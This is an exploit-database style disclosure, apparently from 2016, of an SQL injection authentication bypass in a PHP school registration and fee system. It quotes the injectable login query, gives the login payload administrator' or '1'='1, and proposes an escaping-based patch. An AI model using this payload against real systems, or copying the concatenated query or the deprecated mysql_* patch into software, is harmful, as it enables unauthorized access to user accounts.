扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# Exploit Title.............. School Registration and Fee System Auth Bypass # Google Dork................ N/A # Date....................... 01/11/2016 # Exploit Author............. opt1lc # Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html # Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip # Version.................... N/A # Tested on.................. XAMPP # CVE........................ N/A # File....................... bilal_final/login.php --------------------------------------------------- ----snip---- $username = $_POST['username']; $password = $_POST['password']; /* student */ $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysql_query($query)or die(mysql_error()); $row = mysql_fetch_array($result); ----snip---- --------------------------------------------------- Exploit ------- You can login with username and password : administrator' or '1'='1 Patching ------- You can use one of function in PHP : mysql_real_escape_string() to --------------------------------------------------- ----snip---- $username = mysql_real_escape_string($_POST['username']); $password = mysql_real_escape_string($_POST['password']); /* student */ $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysql_query($query)or die(mysql_error()); $row = mysql_fetch_array($result); ----snip---- --------------------------------------------------- Credit ------- This vulnerability was discovered and researched by opt1lc Shout ------- My Beautiful Daughter & My Wife Reference ------- http://php.net/manual/en/function.mysql-real-escape-string.php |
体验盒子
